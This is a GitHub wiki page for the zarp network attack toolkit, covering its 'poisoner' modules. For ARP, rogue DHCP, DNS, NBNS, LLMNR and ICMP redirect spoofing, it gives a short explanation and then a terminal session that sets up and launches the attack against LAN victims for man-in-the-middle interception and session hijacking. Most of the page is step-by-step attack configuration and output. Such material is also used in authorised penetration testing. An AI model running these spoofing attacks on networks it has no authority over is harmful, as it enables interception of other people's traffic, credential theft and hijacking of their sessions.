-
Notifications
You must be signed in to change notification settings - Fork 324
Poisoners
bryan alexander edited this page Jul 29, 2014
·
1 revision
These tools work as expected; poisoning hosts for performing MitM, session hijacking, etc. Currently included are ARP, DNS, DHCP, NBNS, ICMP redirect, and LLMNR.
ARP poisoning is the cornerstone of the zarp toolkit; information on the attack can be found in the linked page above.
bryan@debdev:~/tools/zarp$ sudo ./zarp.py [!] Loaded 34 modules. ____ __ ____ ____ (__ ) / _\ ( _ \( _ ' / _/ / \ ) / ) __/ (____)\_/\_/(__\_)(__) [Version: 0.1.5] [1] Poisoners [5] Parameter [2] DoS Attacks [6] Services [3] Sniffers [7] Attacks [4] Scanners [8] Sessions 0) Back > 1 1 +-----+------------------------------------+-------+------+----------+- | | Option | Value | Type | Required | +-----+------------------------------------+-------+------+----------+- | [1] | Interval to send respoofed packets | 2 | int | False | +-----+------------------------------------+-------+------+----------+- | [2] | Address to spoof from target | None | ip | True | +-----+------------------------------------+-------+------+----------+- | [3] | Target to poison | None | ip | True | +-----+------------------------------------+-------+------+----------+- 0) Back ARP Spoof > 3 192.168.1.219 ARP Spoof > 2 192.168.1.1 ARP Spoof > 1 5 +-----+------------------------------------+---------------+------+----------+- | | Option | Value | Type | Required | +-----+------------------------------------+---------------+------+----------+- | [1] | Interval to send respoofed packets | 5 | int | False | +-----+------------------------------------+---------------+------+----------+- | [2] | Address to spoof from target | 192.168.1.1 | ip | True | +-----+------------------------------------+---------------+------+----------+- | [3] | Target to poison | 192.168.1.219 | ip | True | +-----+------------------------------------+---------------+------+----------+- ARP Spoof > r [!] Initializing ARP poison...
There are a couple of ways to do DHCP poisoning; zarp implements DHCP poisoning by deploying a 'rogue' DHCP server that listens for DHCP-ACK or DHCP-DISCOVER packets. If a DHCP-DISCOVER is detected, an IP address is reserved and assigned to the host and an ARP poisoning session is automatically deployed. If a DHCP-ACK is detected, we attempt to give them the address they're requesting. This occurs in cases where a returning device would like its IP address back. If we cannot give them the address, we generate a new one and hand it out.
+-----+--------------------------------+-------+--------+----------+- | | Option | Value | Type | Required | +-----+--------------------------------+-------+--------+----------+- | [1] | Netmask to distribute IPs from | None | ipmask | True | +-----+--------------------------------+-------+--------+----------+- | [2] | Spoofed gateway address | None | ip | True | +-----+--------------------------------+-------+--------+----------+- 0) Back DHCP Spoof > 1 192.168.2.1/24 DHCP Spoof > 2 192.168.1.1 +-----+--------------------------------+----------------+--------+----------+- | | Option | Value | Type | Required | +-----+--------------------------------+----------------+--------+----------+- | [1] | Netmask to distribute IPs from | 192.168.2.1/24 | ipmask | True | +-----+--------------------------------+----------------+--------+----------+- | [2] | Spoofed gateway address | 192.168.1.1 | ip | True | +-----+--------------------------------+----------------+--------+----------+- 0) Back DHCP Spoof > r [!] Configuring rogue DHCP server...
DNS poisoning is performed by matching DNS requests and responding with a malicious packet.
> 2 +-----+-----------------------------+-------+-------+----------+- | | Option | Value | Type | Required | +-----+-----------------------------+-------+-------+----------+- | [1] | Regex to match DNS | None | regex | True | +-----+-----------------------------+-------+-------+----------+- | [2] | Host to spoof requests from | None | ip | False | +-----+-----------------------------+-------+-------+----------+- | [3] | Redirect DNS request to | None | str | True | +-----+-----------------------------+-------+-------+----------+- 0) Back DNS Spoof > 1 ^.*$ DNS Spoof > 2 192.168.1.219 DNS Spoof > 3 192.168.1.97 +-----+-----------------------------+---------------+-------+----------+- | | Option | Value | Type | Required | +-----+-----------------------------+---------------+-------+----------+- | [1] | Regex to match DNS | ^.*$ | regex | True | +-----+-----------------------------+---------------+-------+----------+- | [2] | Host to spoof requests from | 192.168.1.219 | ip | False | +-----+-----------------------------+---------------+-------+----------+- | [3] | Redirect DNS request to | 192.168.1.97 | str | True | +-----+-----------------------------+---------------+-------+----------+- 0) Back DNS Spoof > r [!] Starting DNS spoofer...
NBNS is a Windows broadcast protocol that's a lot like ARP; no authentication and arbitrary response acceptance. This module listens for NBNS requests and uses a regex string to match desired request names, then spoofing the response to send the victim to the desired location.
> 4 +-----+---------------------+-------+-------+----------+- | | Option | Value | Type | Required | +-----+---------------------+-------+-------+----------+- | [1] | Match request regex | None | regex | True | +-----+---------------------+-------+-------+----------+- | [2] | Redirect to | None | ip | True | +-----+---------------------+-------+-------+----------+- 0) Back NBNS Poison > 1 ^.*$ NBNS Poison > 2 192.168.1.97 +-----+---------------------+--------------+-------+----------+- | | Option | Value | Type | Required | +-----+---------------------+--------------+-------+----------+- | [1] | Match request regex | ^.*$ | regex | True | +-----+---------------------+--------------+-------+----------+- | [2] | Redirect to | 192.168.1.97 | ip | True | +-----+---------------------+--------------+-------+----------+- 0) Back NBNS Poison > r [!] Starting NBNS spoofer...
LLMNR (Link-local Multicast Name Resolution) is a Windows broadcast protocol that supersedes NBNS (Vista and up). It operates, essentially, in the same way.
> 5 +-----+---------------------+-------+-------+----------+- | | Option | Value | Type | Required | +-----+---------------------+-------+-------+----------+- | [1] | Match request regex | None | regex | True | +-----+---------------------+-------+-------+----------+- | [2] | Redirect to | None | ip | True | +-----+---------------------+-------+-------+----------+- 0) Back LLMNR Spoofer > 1 ^.*$ LLMNR Spoofer > 2 192.168.1.97 +-----+---------------------+--------------+-------+----------+- | | Option | Value | Type | Required | +-----+---------------------+--------------+-------+----------+- | [1] | Match request regex | ^.*$ | regex | True | +-----+---------------------+--------------+-------+----------+- | [2] | Redirect to | 192.168.1.97 | ip | True | +-----+---------------------+--------------+-------+----------+- 0) Back LLMNR Spoofer > r [!] Starting LLMNR spoofer...
[http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats ICMP redirect attacks] are rather archaic and disabled on many hosts, but occasionally you may run into a system that's susceptible.
+-----+------------------------------------------------+-------+------+----------+- | | Option | Value | Type | Required | +-----+------------------------------------------------+-------+------+----------+- | [1] | Redirect victim to | None | ip | True | +-----+------------------------------------------------+-------+------+----------+- | [2] | Interval (seconds) to send respoofed redirects | 15 | int | False | +-----+------------------------------------------------+-------+------+----------+- | [3] | Redirect host | None | ip | True | +-----+------------------------------------------------+-------+------+----------+- 0) Back ICMP Redirection > 1 192.168.1.97 ICMP Redirection > 3 192.168.1.219 +-----+------------------------------------------------+---------------+------+----------+- | | Option | Value | Type | Required | +-----+------------------------------------------------+---------------+------+----------+- | [1] | Redirect victim to | 192.168.1.97 | ip | True | +-----+------------------------------------------------+---------------+------+----------+- | [2] | Interval (seconds) to send respoofed redirects | 15 | int | False | +-----+------------------------------------------------+---------------+------+----------+- | [3] | Redirect host | 192.168.1.219 | ip | True | +-----+------------------------------------------------+---------------+------+----------+- 0) Back ICMP Redirection > r [!] Initializing ICMP poison...